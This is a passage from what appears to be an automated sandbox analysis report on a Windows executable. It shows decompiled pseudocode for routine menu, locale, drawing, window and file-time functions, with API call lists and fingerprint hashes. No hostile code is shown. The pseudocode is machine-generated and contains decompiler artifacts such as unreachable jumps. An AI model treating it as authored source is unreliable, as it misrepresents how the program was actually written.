                                                                        							}
                                                                        						}
                                                                        						_t111 = _t111 + 1;
                                                                        						_t10 =  &_v8;
                                                                        						 *_t10 = _v8 - 1;
                                                                        					} while ( *_t10 != 0);
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • GetMenu.USER32(00000000), ref: 00450BC4
                                                                        • SetMenu.USER32(00000000,00000000), ref: 00450BE1
                                                                        • SetMenu.USER32(00000000,00000000), ref: 00450C16
                                                                        • SetMenu.USER32(00000000,00000000,00000000,00450C66), ref: 00450C32
                                                                          • Part of subcall function 00406548: LoadStringA.USER32 ref: 00406579
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Menu$LoadString
                                                                        • String ID:
                                                                        • API String ID: 3688185913-0
                                                                        • Opcode ID: 7f759e05d317f3d3ed5b3ef52ee0ca78adf4f75efa92f7d46a79bbff11cb3295
                                                                        • Instruction ID: 93c5ed83d1bbe9563ebe99875d81bd0e706f4a4ab4f057bf17101cf897a6ad90
                                                                        • Opcode Fuzzy Hash: 7f759e05d317f3d3ed5b3ef52ee0ca78adf4f75efa92f7d46a79bbff11cb3295
                                                                        • Instruction Fuzzy Hash: 3751DD34A002449BDB25AFBA89C579E77959F05309F0415BBBC44AB397CA3CEC89C75C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0040AE3C() {
                                                                        				char _v152;
                                                                        				short _v410;
                                                                        				signed short _t14;
                                                                        				signed int _t16;
                                                                        				int _t18;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				int _t24;
                                                                        				int _t26;
                                                                        				signed int _t30;
                                                                        				signed int _t31;
                                                                        				signed int _t32;
                                                                        				signed int _t37;
                                                                        				int* _t39;
                                                                        				short* _t41;
                                                                        				void* _t49;
                                                                        
                                                                        				 *0x4967f0 = 0x409;
                                                                        				 *0x4967f4 = 9;
                                                                        				 *0x4967f8 = 1;
                                                                        				_t14 = GetThreadLocale();
                                                                        				if(_t14 != 0) {
                                                                        					 *0x4967f0 = _t14;
                                                                        				}
                                                                        				if(_t14 != 0) {
                                                                        					 *0x4967f4 = _t14 & 0x3ff;
                                                                        					 *0x4967f8 = (_t14 & 0x0000ffff) >> 0xa;
                                                                        				}
                                                                        				memcpy(0x47a0c0, 0x40af90, 8 << 2);
                                                                        				if( *0x47a0ac != 2) {
                                                                        					_t16 = GetSystemMetrics(0x4a);
                                                                        					__eflags = _t16;
                                                                        					 *0x4967fd = _t16 & 0xffffff00 | _t16 != 0x00000000;
                                                                        					_t18 = GetSystemMetrics(0x2a);
                                                                        					__eflags = _t18;
                                                                        					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
                                                                        					 *0x4967fc = _t31;
                                                                        					__eflags = _t31;
                                                                        					if(__eflags != 0) {
                                                                        						return E0040ADC4(__eflags, _t49);
                                                                        					}
                                                                        				} else {
                                                                        					_t20 = E0040AE24();
                                                                        					if(_t20 != 0) {
                                                                        						 *0x4967fd = 0;
                                                                        						 *0x4967fc = 0;
                                                                        						return _t20;
                                                                        					}
                                                                        					E0040ADC4(__eflags, _t49);
                                                                        					_t37 = 0x20;
                                                                        					_t23 = E00403120(0x47a0c0, 0x20, 0x40af90);
                                                                        					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
                                                                        					 *0x4967fc = _t32;
                                                                        					__eflags = _t32;
                                                                        					if(_t32 != 0) {
                                                                        						 *0x4967fd = 0;
                                                                        						return _t23;
                                                                        					}
                                                                        					_t24 = 0x80;
                                                                        					_t39 =  &_v152;
                                                                        					do {
                                                                        						 *_t39 = _t24;
                                                                        						_t24 = _t24 + 1;
                                                                        						_t39 =  &(_t39[0]);
                                                                        						__eflags = _t24 - 0x100;
                                                                        					} while (_t24 != 0x100);
                                                                        					_t26 =  *0x4967f0; // 0x409
                                                                        					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
                                                                        					_t18 = 0x80;
                                                                        					_t41 =  &_v410;
                                                                        					while(1) {
                                                                        						__eflags =  *_t41 - 2;
                                                                        						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
                                                                        						 *0x4967fd = _t37;
                                                                        						__eflags = _t37;
                                                                        						if(_t37 != 0) {
                                                                        							goto L17;
                                                                        						}
                                                                        						_t41 = _t41 + 2;
                                                                        						_t18 = _t18 - 1;
                                                                        						__eflags = _t18;
                                                                        						if(_t18 != 0) {
                                                                        							continue;
                                                                        						} else {
                                                                        							return _t18;
                                                                        						}
                                                                        						L18:
                                                                        					}
                                                                        				}
                                                                        				L17:
                                                                        				return _t18;
                                                                        				goto L18;
                                                                        			}

                                                                        APIs
                                                                        • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AF30
                                                                        • GetThreadLocale.KERNEL32 ref: 0040AE66
                                                                          • Part of subcall function 0040ADC4: GetCPInfo.KERNEL32(00000000,?), ref: 0040ADDD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: InfoLocaleStringThreadType
                                                                        • String ID:
                                                                        • API String ID: 1505017576-0
                                                                        • Opcode ID: 9943d390ba79cd53de8c6b22d9f9e13eafadf78107b92bd341a0d54ad34a03fa
                                                                        • Instruction ID: 6a4de5057cbed62019ff6cd1b2bb6358f707544f7e948a3695c44cd18fd2b04b
                                                                        • Opcode Fuzzy Hash: 9943d390ba79cd53de8c6b22d9f9e13eafadf78107b92bd341a0d54ad34a03fa
                                                                        • Instruction Fuzzy Hash: B731F6A16803839AD710DB65AC01FA63794EB6134CF1580FBE984AB3D2DB3D4865C76F
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 64%
                                                                        			E00423738(intOrPtr __eax, void* __edx) {
                                                                        				intOrPtr _v8;
                                                                        				void* __ebx;
                                                                        				void* __ecx;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t33;
                                                                        				struct HDC__* _t47;
                                                                        				intOrPtr _t54;
                                                                        				intOrPtr _t58;
                                                                        				struct HDC__* _t66;
                                                                        				void* _t67;
                                                                        				intOrPtr _t76;
                                                                        				void* _t81;
                                                                        				intOrPtr _t82;
                                                                        				intOrPtr _t84;
                                                                        				intOrPtr _t86;
                                                                        
                                                                        				_t84 = _t86;
                                                                        				_push(_t67);
                                                                        				_v8 = __eax;
                                                                        				_t33 = _v8;
                                                                        				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
                                                                        					return _t33;
                                                                        				} else {
                                                                        					E00420398(_v8);
                                                                        					_push(_t84);
                                                                        					_push(0x423817);
                                                                        					_push( *[fs:eax]);
                                                                        					 *[fs:eax] = _t86;
                                                                        					E00424A54( *((intOrPtr*)(_v8 + 0x58)));
                                                                        					E004235B4( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
                                                                        					_t47 = E00424C34( *((intOrPtr*)(_v8 + 0x58)));
                                                                        					_push(0);
                                                                        					L00406AE4();
                                                                        					_t66 = _t47;
                                                                        					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
                                                                        					if(_t81 == 0) {
                                                                        						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
                                                                        					} else {
                                                                        						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
                                                                        					}
                                                                        					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
                                                                        					_t82 =  *((intOrPtr*)(_t54 + 0x10));
                                                                        					if(_t82 == 0) {
                                                                        						 *((intOrPtr*)(_v8 + 0x60)) = 0;
                                                                        					} else {
                                                                        						_push(0xffffffff);
                                                                        						_push(_t82);
                                                                        						_push(_t66);
                                                                        						L00406C5C();
                                                                        						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
                                                                        						_push(_t66);
                                                                        						L00406C2C();
                                                                        					}
                                                                        					E004207B0(_v8, _t66);
                                                                        					_t58 =  *0x47a788; // 0x21506f4
                                                                        					E00414814(_t58, _t66, _t67, _v8, _t82);
                                                                        					_pop(_t76);
                                                                        					 *[fs:eax] = _t76;
                                                                        					_push(0x42381e);
                                                                        					return E00420604(_v8);
                                                                        				}
                                                                        			}

                                                                        APIs
                                                                          • Part of subcall function 00420398: RtlEnterCriticalSection.KERNEL32(00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203A0
                                                                          • Part of subcall function 00420398: RtlLeaveCriticalSection.KERNEL32(00496A5C,00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203AD
                                                                          • Part of subcall function 00420398: RtlEnterCriticalSection.KERNEL32(00000038,00496A5C,00496A5C,00000000,0041EB36,00000000,0041EB95), ref: 004203B6
                                                                          • Part of subcall function 00424C34: 72E7AC50.USER32(00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424C8A
                                                                          • Part of subcall function 00424C34: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424C9F
                                                                          • Part of subcall function 00424C34: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CA9
                                                                          • Part of subcall function 00424C34: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CCD
                                                                          • Part of subcall function 00424C34: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CD8
                                                                        • 72E7A590.GDI32(00000000,00000000,00423817), ref: 0042378D
                                                                        • SelectObject.GDI32(00000000,?), ref: 004237A6
                                                                        • 72E7B410.GDI32(00000000,?,000000FF,00000000,00000000,00423817), ref: 004237CF
                                                                        • 72E7B150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,00423817), ref: 004237DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CriticalSection$Enter$A590B150B380B410CreateHalftoneLeaveObjectPaletteSelect
                                                                        • String ID:
                                                                        • API String ID: 2198039625-0
                                                                        • Opcode ID: 203f0397a64ac40e7499ccf111a216786857c1fb4d26d7cfa4227f97008cbdc8
                                                                        • Instruction ID: c88b5c0543f23b78fd250c8d9274629173d69d4b00430ff76432291ce0c063de
                                                                        • Opcode Fuzzy Hash: 203f0397a64ac40e7499ccf111a216786857c1fb4d26d7cfa4227f97008cbdc8
                                                                        • Instruction Fuzzy Hash: E0310874B04654EFDB04EF5AD981D4DB3F5EF48714B6281A6F804AB362C738EE80DA44
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0044A130(void* __eax, struct HMENU__* __edx, int _a4, int _a8, CHAR* _a12) {
                                                                        				intOrPtr _v8;
                                                                        				void* __ecx;
                                                                        				void* __edi;
                                                                        				int _t27;
                                                                        				void* _t40;
                                                                        				int _t41;
                                                                        				int _t50;
                                                                        
                                                                        				_t50 = _t41;
                                                                        				_t49 = __edx;
                                                                        				_t40 = __eax;
                                                                        				if(E0044983C(__eax) == 0) {
                                                                        					return GetMenuStringA(__edx, _t50, _a12, _a8, _a4);
                                                                        				}
                                                                        				_v8 = 0;
                                                                        				if((GetMenuState(__edx, _t50, _a4) & 0x00000010) == 0) {
                                                                        					_t27 = GetMenuItemID(_t49, _t50);
                                                                        					_t51 = _t27;
                                                                        					if(_t27 != 0xffffffff) {
                                                                        						_v8 = E004496B8(_t40, 0, _t51);
                                                                        					}
                                                                        				} else {
                                                                        					_t49 = GetSubMenu(_t49, _t50);
                                                                        					_v8 = E004496B8(_t40, 1, _t37);
                                                                        				}
                                                                        				if(_v8 == 0) {
                                                                        					return 0;
                                                                        				} else {
                                                                        					 *_a12 = 0;
                                                                        					E00408CB4(_a12, _a8,  *((intOrPtr*)(_v8 + 0x30)));
                                                                        					return E00408BF8(_a12, _t49);
                                                                        				}
                                                                        			}











                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Menu$ItemStateString
                                                                        • String ID:
                                                                        • API String ID: 306270399-0
                                                                        • Opcode ID: af27d79cfe480bb9dac1f77887aba6b23f9a8f8e784e1544a95a4dfe15637787
                                                                        • Instruction ID: a086aaca1138dc505a42b3517b193e50cf2349fe978f08e3be5af1dc0d792112
                                                                        • Opcode Fuzzy Hash: af27d79cfe480bb9dac1f77887aba6b23f9a8f8e784e1544a95a4dfe15637787
                                                                        • Instruction Fuzzy Hash: 64117F31602214AFDB00EF2D8C81AAF77E89F4A364F10446AF819E7382D6389D11D769
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0045BF2C(intOrPtr* __eax, int __ecx, RECT* __edx) {
                                                                        				int _t9;
                                                                        				int _t12;
                                                                        				int _t26;
                                                                        				int _t34;
                                                                        				int _t37;
                                                                        				intOrPtr* _t43;
                                                                        				int* _t44;
                                                                        
                                                                        				_t37 = __ecx;
                                                                        				_t44 = __edx;
                                                                        				_t43 = __eax;
                                                                        				_t9 = IsRectEmpty(__edx);
                                                                        				_t47 = _t9;
                                                                        				if(_t9 != 0) {
                                                                        					return E0045BEC4(_t43, _t47);
                                                                        				}
                                                                        				 *((intOrPtr*)( *_t43 + 0x94))();
                                                                        				__eflags = _t37;
                                                                        				if(_t37 != 0) {
                                                                        					L5:
                                                                        					_t12 = 1;
                                                                        				} else {
                                                                        					_t34 = IsWindowVisible(E0043CC2C(_t43));
                                                                        					__eflags = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						goto L5;
                                                                        					} else {
                                                                        						_t12 = 0;
                                                                        					}
                                                                        				}
                                                                        				E0045BE40(_t43);
                                                                        				SetWindowPos(E0043CC2C(_t43), 0,  *_t44, _t44[1], _t44[2] -  *_t44, _t44[3] - _t44[1], 0x48);
                                                                        				 *((intOrPtr*)( *_t43 + 0xf8))();
                                                                        				__eflags = _t12;
                                                                        				if(__eflags != 0) {
                                                                        					E0045BE40(_t43);
                                                                        				}
                                                                        				_t26 = E004037D8( *((intOrPtr*)(_t43 + 0x240)), __eflags);
                                                                        				__eflags = _t26;
                                                                        				if(_t26 != 0) {
                                                                        					return SetFocus(E0043CC2C(_t43));
                                                                        				}
                                                                        				return _t26;
                                                                        			}











                                                                        APIs
                                                                        • IsRectEmpty.USER32 ref: 0045BF37
                                                                        • IsWindowVisible.USER32(00000000), ref: 0045BF62
                                                                        • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000048,?,?,?,?,0045C043,00460E8C), ref: 0045BF9A
                                                                        • SetFocus.USER32(00000000,?,?,?,?,00000048,?,?,?,?,0045C043,00460E8C), ref: 0045BFCF
                                                                          • Part of subcall function 0045BEC4: IsWindowVisible.USER32(00000000), ref: 0045BEDB
                                                                          • Part of subcall function 0045BEC4: SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,00460D36,00460D3E,?,?,0045C694), ref: 0045BF02
                                                                          • Part of subcall function 0045BEC4: SetFocus.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,0000008C,00000000,?,?,00460D36,00460D3E,?,?,0045C694), ref: 0045BF22
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$FocusVisible$EmptyRect
                                                                        • String ID:
                                                                        • API String ID: 698668684-0
                                                                        • Opcode ID: 5a7f43292a819dc966d5a9846035b269f477fe0f4055a0f3a77478acf61808e0
                                                                        • Instruction ID: 0c7870d5d9d24088c3abd12cb0ef2774cc45ea1f721d3d528cff2115086cf705
                                                                        • Opcode Fuzzy Hash: 5a7f43292a819dc966d5a9846035b269f477fe0f4055a0f3a77478acf61808e0
                                                                        • Instruction Fuzzy Hash: 1B1177713002016BD511BA7A8D85A6BB79DDF45345B08056AFD48DB343CB2DEC0697AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 58%
                                                                        			E00422948(int __eax, intOrPtr __ecx, void* __edx) {
                                                                        				struct tagRECT _v32;
                                                                        				int _t11;
                                                                        				void* _t21;
                                                                        				void* _t23;
                                                                        				int _t26;
                                                                        				void* _t30;
                                                                        				void* _t32;
                                                                        				void* _t33;
                                                                        				void* _t35;
                                                                        				void* _t36;
                                                                        
                                                                        				_t11 = __eax;
                                                                        				_v32.bottom = __ecx;
                                                                        				_t30 = __edx;
                                                                        				_t26 = __eax;
                                                                        				if( *((intOrPtr*)(__eax + 0x28)) != 0) {
                                                                        					_t33 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                        					_t36 = 0;
                                                                        					if(_t33 != 0) {
                                                                        						_push(0xffffffff);
                                                                        						_push(_t33);
                                                                        						_t23 = E00420730(__edx);
                                                                        						_push(_t23);
                                                                        						L00406C5C();
                                                                        						_t36 = _t23;
                                                                        						_push(E00420730(_t30));
                                                                        						L00406C2C();
                                                                        					}
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					_t32 = _t30;
                                                                        					_t35 = _t33;
                                                                        					_v32.right = _v32.right - 1;
                                                                        					_v32.bottom = _v32.bottom - 1;
                                                                        					_t11 = PlayEnhMetaFile(E00420730(_t32),  *( *((intOrPtr*)(_t26 + 0x28)) + 8),  &_v32);
                                                                        					if(_t35 != 0) {
                                                                        						_push(0xffffffff);
                                                                        						_push(_t36);
                                                                        						_t21 = E00420730(_t32);
                                                                        						_push(_t21);
                                                                        						L00406C5C();
                                                                        						return _t21;
                                                                        					}
                                                                        				}
                                                                        				return _t11;
                                                                        			}














                                                                        APIs
                                                                        • 72E7B410.GDI32(00000000,00000000,000000FF), ref: 00422976
                                                                        • 72E7B150.GDI32(00000000,00000000,00000000,000000FF), ref: 00422985
                                                                        • PlayEnhMetaFile.GDI32(00000000,?,?), ref: 004229B7
                                                                        • 72E7B410.GDI32(00000000,00000000,000000FF,00000000,?,?), ref: 004229CB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp Download File
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp Download File
                                                                        Similarity
                                                                        • API ID: B410$B150FileMetaPlay
                                                                        • String ID:
                                                                        • API String ID: 1962039817-0
                                                                        • Opcode ID: 7875b06541b9173ceedcf1f29655bc06f0622a56d0d5ab255043b0cd6fadb081
                                                                        • Instruction ID: 088bed5f8542f6c822edce03a29eb1a8d7af9251e81d94029e29098bb0995351
                                                                        • Opcode Fuzzy Hash: 7875b06541b9173ceedcf1f29655bc06f0622a56d0d5ab255043b0cd6fadb081
                                                                        • Instruction Fuzzy Hash: 7301A5717082206BC210BB699C8495BB3DDDF85320F06063BB858EB382D679EC40DAD9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E004555D8(void* __eax, void* __ecx, char __edx) {
                                                                        				char _v12;
                                                                        				struct HWND__* _v20;
                                                                        				int _t17;
                                                                        				void* _t27;
                                                                        				struct HWND__* _t33;
                                                                        				void* _t35;
                                                                        				void* _t36;
                                                                        				long _t37;
                                                                        
                                                                        				_t37 = _t36 + 0xfffffff8;
                                                                        				_t27 = __eax;
                                                                        				_t17 =  *0x496c04; // 0x2150d40
                                                                        				if( *((intOrPtr*)(_t17 + 0x30)) != 0) {
                                                                        					if( *((intOrPtr*)(__eax + 0x94)) == 0) {
                                                                        						 *_t37 =  *((intOrPtr*)(__eax + 0x30));
                                                                        						_v12 = __edx;
                                                                        						EnumWindows(E00455568, _t37);
                                                                        						_t5 = _t27 + 0x90; // 0x0
                                                                        						_t17 =  *_t5;
                                                                        						if( *((intOrPtr*)(_t17 + 8)) != 0) {
                                                                        							_t33 = GetWindow(_v20, 3);
                                                                        							_v20 = _t33;
                                                                        							if((GetWindowLongA(_t33, 0xffffffec) & 0x00000008) != 0) {
                                                                        								_v20 = 0xfffffffe;
                                                                        							}
                                                                        							_t10 = _t27 + 0x90; // 0x0
                                                                        							_t17 =  *_t10;
                                                                        							_t35 =  *((intOrPtr*)(_t17 + 8)) - 1;
                                                                        							if(_t35 >= 0) {
                                                                        								do {
                                                                        									_t13 = _t27 + 0x90; // 0x0
                                                                        									_t17 = SetWindowPos(E00414208( *_t13, _t35), _v20, 0, 0, 0, 0, 0x213);
                                                                        									_t35 = _t35 - 1;
                                                                        								} while (_t35 != 0xffffffff);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					 *((intOrPtr*)(_t27 + 0x94)) =  *((intOrPtr*)(_t27 + 0x94)) + 1;
                                                                        				}
                                                                        				return _t17;
                                                                        			}












                                                                        APIs
                                                                        • EnumWindows.USER32(00455568), ref: 0045560D
                                                                        • GetWindow.USER32(00000003,00000003), ref: 00455625
                                                                        • GetWindowLongA.USER32 ref: 00455632
                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000213,00000000,000000EC), ref: 00455671
                                                                        Similarity
                                                                        • API ID: Window$EnumLongWindows
                                                                        • String ID:
                                                                        • API String ID: 4191631535-0
                                                                        • Opcode ID: 059f7337a3b95d907635159adef8cbabbda6ccd3a0e79a6ce7d253a1261b5fdf
                                                                        • Instruction ID: 2c8fcb29ad70036d63b1f57068b34d5d0e3d2e3afda160b4fc5bec8406b8bc50
                                                                        • Opcode Fuzzy Hash: 059f7337a3b95d907635159adef8cbabbda6ccd3a0e79a6ce7d253a1261b5fdf
                                                                        • Instruction Fuzzy Hash: 94115170604650AFDB10AB2CCC95FA673D8EB04725F55017AFD98AB2D3C3749C44C799
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00408954(WORD* __eax) {
                                                                        				struct _FILETIME _v12;
                                                                        				long _t20;
                                                                        				WORD* _t30;
                                                                        				void* _t35;
                                                                        				struct _FILETIME* _t36;
                                                                        
                                                                        				_t36 = _t35 + 0xfffffff8;
                                                                        				_t30 = __eax;
                                                                        				while((_t30[0xc].dwFileAttributes & _t30[8]) != 0) {
                                                                        					if(FindNextFileA(_t30[0xa],  &(_t30[0xc])) != 0) {
                                                                        						continue;
                                                                        					} else {
                                                                        						_t20 = GetLastError();
                                                                        					}
                                                                        					L5:
                                                                        					return _t20;
                                                                        				}
                                                                        				FileTimeToLocalFileTime( &(_t30[0x16]), _t36);
                                                                        				FileTimeToDosDateTime( &_v12,  &(_t30[1]), _t30);
                                                                        				_t30[2] = _t30[0x1c];
                                                                        				_t30[4] = _t30[0xc].dwFileAttributes;
                                                                        				E004045B0( &(_t30[6]), 0x104,  &(_t30[0x22]));
                                                                        				_t20 = 0;
                                                                        				goto L5;
                                                                        			}









                                                                        APIs
                                                                        • FindNextFileA.KERNEL32(?,?), ref: 00408964
                                                                        • GetLastError.KERNEL32(?,?), ref: 0040896D
                                                                        • FileTimeToLocalFileTime.KERNEL32(?), ref: 00408981
                                                                        • FileTimeToDosDateTime.KERNEL32 ref: 00408990
                                                                        Similarity
                                                                        • API ID: FileTime$DateErrorFindLastLocalNext
                                                                        • String ID:
                                                                        • API String ID: 2103556486-0
                                                                        • Opcode ID: f4b683beff1fc4ac594b1e258cc49dcaf875b64362cef98da73fec0dfe3fedf2
                                                                        • Instruction ID: 56775c696c456fa3967af653f38531e12ac447ffae477507b2a71b5a2badd77f
                                                                        • Opcode Fuzzy Hash: f4b683beff1fc4ac594b1e258cc49dcaf875b64362cef98da73fec0dfe3fedf2
                                                                        • Instruction Fuzzy Hash: B2F012B25052019FCB44FF64C9C289737DC9B4431471085B7AD45DB287E638D558C7A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00454EF4(void* __ecx) {
                                                                        				void* _t2;
                                                                        				DWORD* _t7;
                                                                        
                                                                        				_t2 =  *0x496c04; // 0x2150d40
                                                                        				if( *((char*)(_t2 + 0xa5)) == 0) {
                                                                        					if( *0x496c1c == 0) {
                                                                        						_t2 = SetWindowsHookExA(3, E00454EB0, 0, GetCurrentThreadId());
                                                                        						 *0x496c1c = _t2;
                                                                        					}
                                                                        					if( *0x496c18 == 0) {
                                                                        						_t2 = CreateEventA(0, 0, 0, 0);
                                                                        						 *0x496c18 = _t2;
                                                                        					}
                                                                        					if( *0x496c20 == 0) {
                                                                        						_t2 = CreateThread(0, 0x3e8, E00454E54, 0, 0, _t7);
                                                                        						 *0x496c20 = _t2;
                                                                        					}
                                                                        				}
                                                                        				return _t2;
                                                                        			}






                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00454F0C
                                                                        • SetWindowsHookExA.USER32 ref: 00454F1C
                                                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00457722,?,?,02150D40,?,?,00457150,?), ref: 00454F37
                                                                        • CreateThread.KERNEL32(00000000,000003E8,00454E54,00000000,00000000), ref: 00454F5B
                                                                        Similarity
                                                                        • API ID: CreateThread$CurrentEventHookWindows
                                                                        • String ID:
                                                                        • API String ID: 1195359707-0
                                                                        • Opcode ID: fd125726600852bf513bec1e84033e9793126fea7cae9ee54921391b8d34fd8e
                                                                        • Instruction ID: 733cf5ddf0306959f392ce9496ddc13725008b47f7b701b11ded11e2ae76990f
                                                                        • Opcode Fuzzy Hash: fd125726600852bf513bec1e84033e9793126fea7cae9ee54921391b8d34fd8e
                                                                        • Instruction Fuzzy Hash: C0F03071A843006EF610AB15AD47F163694E364B1BF12403BFA447E1D2CBB914C48A5D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 28%
                                                                        			E00423FFC(void* __eflags) {
                                                                        				intOrPtr _t13;
                                                                        				intOrPtr _t19;
                                                                        				void* _t20;
                                                                        
                                                                        				DeleteObject( *(_t20 - 0x10));
                                                                        				E00403DD0();
                                                                        				E00403E24();
                                                                        				_pop(_t19);
                                                                        				 *[fs:eax] = _t19;
                                                                        				_push(0x42404d);
                                                                        				DeleteDC( *(_t20 - 0x1c));
                                                                        				_t13 =  *((intOrPtr*)(_t20 - 0x18));
                                                                        				_push(_t13);
                                                                        				_push(0);
                                                                        				L00407124();
                                                                        				if( *(_t20 - 0x10) != 0) {
